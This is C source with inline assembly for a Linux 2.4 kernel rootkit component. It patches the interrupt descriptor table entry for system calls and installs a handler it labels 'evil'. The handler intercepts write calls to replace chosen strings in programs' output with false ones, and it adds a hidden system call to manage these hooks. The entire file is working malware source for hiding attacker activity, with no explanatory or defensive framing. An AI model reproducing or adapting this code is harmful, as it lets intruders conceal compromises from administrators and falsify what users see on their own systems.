#include <linux/linkage.h>

#include "shared.h"

#define SYS_read 	3
#define SYS_write	4
#define SYS_execve	11
#define SYS_hijack	254

#define MAX_SIZE	700
#define SYS_CALL	574

//from kernel source
#define __GFP_WAIT      0x10    /* Can wait and reschedule? */
#define __GFP_HIGH      0x20    /* Should access emergency pools? */
#define __GFP_IO        0x40    /* Can start low memory physical IO? */
#define __GFP_HIGHIO    0x80    /* Can start high mem physical IO? */
#define __GFP_FS        0x100   /* Can call down to low-level FS? */

//works on most 2.4.x kernel
#define GFP_KERNEL (__GFP_HIGH | __GFP_WAIT | __GFP_IO | __GFP_HIGHIO | __GFP_FS)


//[--------------------VARIABLE DEFINITION---------------------]


extern unsigned long old_stub;
extern unsigned long hostile_code;
extern struct hook_list *hook_list;
extern int is_init;
extern int comm_offset;
extern char id_total;

extern unsigned long (*copy_from) (void *,const void *,unsigned long);
extern unsigned long (*copy_to)   (void *,const void *,unsigned long);
extern char *        (*kmalloc_s) (int,int);
extern int           (*kfree_s)   (char *);
extern int           (*printk_s)  (char *, ...);

struct pt_regs {
        long ebx;
        long ecx;
        long edx;
        long esi;
        long edi;
        long ebp;
        long eax;
        int  xds;
        int  xes;
        long orig_eax;
        long eip;
        int  xcs;
        long eflags;
        long esp;
        int  xss;
};

struct hook_list
    {
    char id;
    char program[50];
    char hide_string[50];
    char false_string[50];
    struct hook_list *next;
    };


//[-----------------EVIL INTERRUPT HANDLER-------------------------------]


void stub_kad(void) 
{
__asm__ (
        ".globl my_stub                 \n"
        ".align 4,0x90                  \n"
        "my_stub:                       \n"
	"	pushl %%ds		\n"
	"	pushl %%eax		\n"
	"	pushl %%ebp		\n"
	"	pushl %%edi		\n"
	"	pushl %%esi		\n"
	"	pushl %%edx		\n"
	"	pushl %%ecx		\n"
	"	pushl %%ebx		\n"
	//check if eax == SYS_write
	"       xor   %%ebx,%%ebx       \n"
	"       movl  %2,%%ebx          \n"
	"       cmpl  %%eax,%%ebx       \n"
	"	je    good		\n"
	//check if eax == SYS_hijack
	"	xor   %%ebx,%%ebx	\n"
	"	movl  %3,%%ebx		\n"
	"	cmpl  %%eax,%%ebx	\n"
	"	je    good		\n"
	//check if eax == SYS_execve
	"	xor   %%ebx,%%ebx	\n"
	"	movl  %4,%%ebx		\n"
	"	cmpl  %%eax,%%ebx	\n"
	"	je    good		\n"	
	"	jmp   end	        \n"
	"good:				\n"
	"       xor   %%ebx,%%ebx       \n" 
	"       mov   %%esp,%%edx       \n"
	"	mov   %%esp,%%ebx	\n"
	"	andl  $-8192,%%ebx	\n"
	"	pushl %%ebx		\n"
        "       push  %%edx             \n"
	"	call *%1		\n"
	"	addl $8,%%esp		\n"
	"end:				\n"
	"	popl %%ebx		\n"
	"	popl %%ecx		\n"
	"	popl %%edx		\n"
	"	popl %%esi		\n"
	"	popl %%edi		\n"
	"	popl %%ebp		\n"
	"	popl %%eax		\n"
	"	popl %%ds		\n"
	
        "       jmp  *%0                \n"
        ::"m"(old_stub),"m"(hostile_code),"i"(SYS_write),"i"(SYS_hijack),"i"(SYS_execve)
	);
}


//[-----------------USEFUL FUNCTION-----------------------------]


int my_strncmp(char *s1,char *s2,int n)
{

  while (--n >= 0 && *s1 == *s2++)
    if (*s1++ == '\0')
      return(0);
  return(n<0 ? 0 : *s1 - *--s2);
}


char * my_strstr(register char *string, char *substring)
{
  register char *a, *b;

  b = substring;
  if (*b == 0) {
    return string;
  }
  for ( ; *string != 0; string += 1) {
    if (*string != *b) {
      continue;
    }
    a = string;
    while (1) {
      if (*b == 0) {
	return string;
      }
      if (*a++ != *b++) {
	break;
      }
    }
    b = substring;
  }
  return((char *) 0);
}

char * my_strncpy(char *to, const char *from, int n)
    {
    char *start = to;
      
    while (*from && n) 
	{
	*to++ = *from++;
        n--;
        }
    
    return start;
    }

char * my_strcpy(char *to, const char *from)
    {
    char *start = to;
      
    while (*from) 
	*to++ = *from++;
    
    return start;
    }


char * my_memset(char * dest,int c,int len)
    {
    char *ptr = dest;

    while(len-- > 0)
	*ptr++=c;
	
    return dest;
    }

int my_strcmp(char *s1, const char *s2)
    {
    for( ; *s1 && *s2; s1++,s2++) 
	{
	if (*s1 < *s2)
	    return -1;
	else if (*s1 > *s2)
	    return 1;
	}
    
    if (*s1)
	return 1;
    else if (*s2)
	return -1;
    
    return 0;
   }

int my_strlen(char *s)
    {
    int len = 0;
    char *ptr = s;
    
    while(*ptr++)
	len++;
	
    return len;
    }


//[-----------------HIJACK MANAGEMENT FUNCTION----------------------]


int add_hijack(struct pt_regs *regs)
    {
    struct hook_list *list = (struct hook_list *) kmalloc_s(sizeof(struct hook_list),GFP_KERNEL);
    
    my_memset(list->program,'\0',50);
    my_memset(list->hide_string,'\0',50);
    my_memset(list->false_string,'\0',50);

    list->id=(char)id_total++;
    my_strcpy(list->program,(char *) regs->ecx);
    my_strcpy(list->hide_string,(char *)regs->edx);
    my_strcpy(list->false_string,(char *)regs->edi);
        
    list->next=hook_list;
    hook_list=list;
		
    return 0;
    }    	
    
int del_hijack(struct pt_regs *regs)
    {
    struct hook_list * ptr;
    
    if(hook_list == 0)
	return 0;
	
    if(hook_list->id == (char)regs->ecx)
	{
	ptr = hook_list->next;
	if(ptr == (struct hook_list *) 0)
	    id_total = '1';
	kfree_s((char *)hook_list);
	hook_list = ptr;
	return 0;
	}
	
    for(ptr=hook_list;ptr->next;ptr=ptr->next)
	{
	if(ptr->next->id == (char)regs->ecx)
	    {
	    struct hook_list *ptr_current = ptr->next;
	    ptr->next = ptr_current->next;
	    kfree_s((char *)ptr_current);
	    return 0;
	    }
	}
    	
    return 0;
    }
    
int list_hijack(struct pt_regs *regs)
    {
    struct hook_list *ptr;
    char *data = (char *) kmalloc_s(800,GFP_KERNEL);
    char *p;
    
    my_memset(data,'\0',800);
    p = data;
    
    for(ptr=hook_list;ptr;ptr=ptr->next)
	{
	my_strncpy(p,"[ ",2);
	p = p + 2;
	*p = ptr->id;
	p = p + 1;
	my_strncpy(p," ]",2);
	p = p + 2 ; 
	my_strncpy(p,"   ",3);
	p = p + 3;
	my_strncpy(p,ptr->program,my_strlen(ptr->program));
	p = p + my_strlen(ptr->program);
	my_strncpy(p,"   :   ",7);
	p = p + 7;
	my_strncpy(p,ptr->hide_string,my_strlen(ptr->hide_string));
	p = p + my_strlen(ptr->hide_string);
	my_strncpy(p,"->",2);
	p = p + 2;
	my_strncpy(p,ptr->false_string,my_strlen(ptr->false_string));
	p = p + my_strlen(ptr->false_string);
	my_strncpy(p,"\n",1);
	p = p + 1;
	}
	
	copy_to((char *)regs->ecx,data,my_strlen(data));
	kfree_s(data);
	
    return 0;
    }

struct hook_list * get_name_progy(char *needed)
    {
    struct hook_list *p;
    for(p=hook_list;p;p=p->next)
	{
	if(!my_strcmp(p->program,needed))
	    return p;
	}
    return 0;
    }


//for restore stub and so clear all hijack
void uninstall_hijack(void)
{
  unsigned char idtr[6];
  unsigned long new_addr=(unsigned long)old_stub;
  unsigned long ptr_idt_table;
  struct descriptor_idt *idte;

  __asm__ volatile ("sidt %0": "=m" (idtr));
  ptr_idt_table = *((unsigned long *) &idtr[2]);
  idte = (struct descriptor_idt *) ptr_idt_table;

  idte[128].offset_high = (unsigned short)(new_addr >> 16);
  idte[128].offset_low  = (unsigned short)(new_addr & 0x0000FFFF);

  return;
}


//[-----------------EVIL FUNCTION-----------------------------------]


asmlinkage void my_function(struct pt_regs *regs,unsigned long addr_task)
    {
    int i;
    char *ptr_current_task = (char *) (addr_task);
    char *find = (char *) 0;
    char *buf;
    struct hook_list *p = 0;

    if((int)regs->eax == SYS_execve && !is_init)
	{
	for(i=0;i < MAX_SIZE; ptr_current_task++,i++)
	    {
	    if(!my_strncmp(ptr_current_task,NAME_PROG,6))
		{
		comm_offset=(unsigned long)(ptr_current_task - addr_task);	        
		is_init=1;
		}
	    }
	    
	}

    if((int)regs->eax == SYS_write && is_init)
	{
	for(p=hook_list;p;p=p->next)
	    {
	    if(!my_strcmp(p->program,(char *)ptr_current_task+comm_offset))
		{
		buf = kmalloc_s((int)regs->edx,GFP_KERNEL);
		copy_from(buf,(char *) regs->ecx,(int)regs->edx);
		find = (char *) my_strstr(buf,p->hide_string);
		if(find != (char *) 0)
		    {
		    my_strncpy(find,p->false_string,my_strlen(p->hide_string));
		    copy_to((char *)regs->ecx,buf,(int)regs->edx);
		    }
		kfree_s(buf);
		}
	    }
	}
    
    if((int)regs->eax == SYS_hijack)
	{
	switch((int)regs->ebx)
	    {
	    case ADD_HIJACK	:
				add_hijack(regs);
				break;
	    case DEL_HIJACK	:
				del_hijack(regs);
				break;
	    case LIST_HIJACK	:
				list_hijack(regs);
				break;
	    case UNINSTALL_HIJACK :
				uninstall_hijack();
				break;
				
	    }	
	}

    return;
    }


unsigned long old_stub = 1;
unsigned long hostile_code = (unsigned long)&my_function;
static int is_init = 0;
static int comm_offset = 0;
static char id_total = '1';
struct hook_list *hook_list = 0;

char*  (*kmalloc_s) (int size,int flags) = (void *) (0x1234567);
int    (*kfree_s)   (char *)             = (void *) (0x1234567);
int    (*printk_s)  (char *, ...)        = (void *) (0x1234567);
unsigned long (*copy_from) (void *,const void *,unsigned long) = (void *) (0x1234567);
unsigned long (*copy_to)   (void *,const void *,unsigned long) = (void *) (0x1234567);

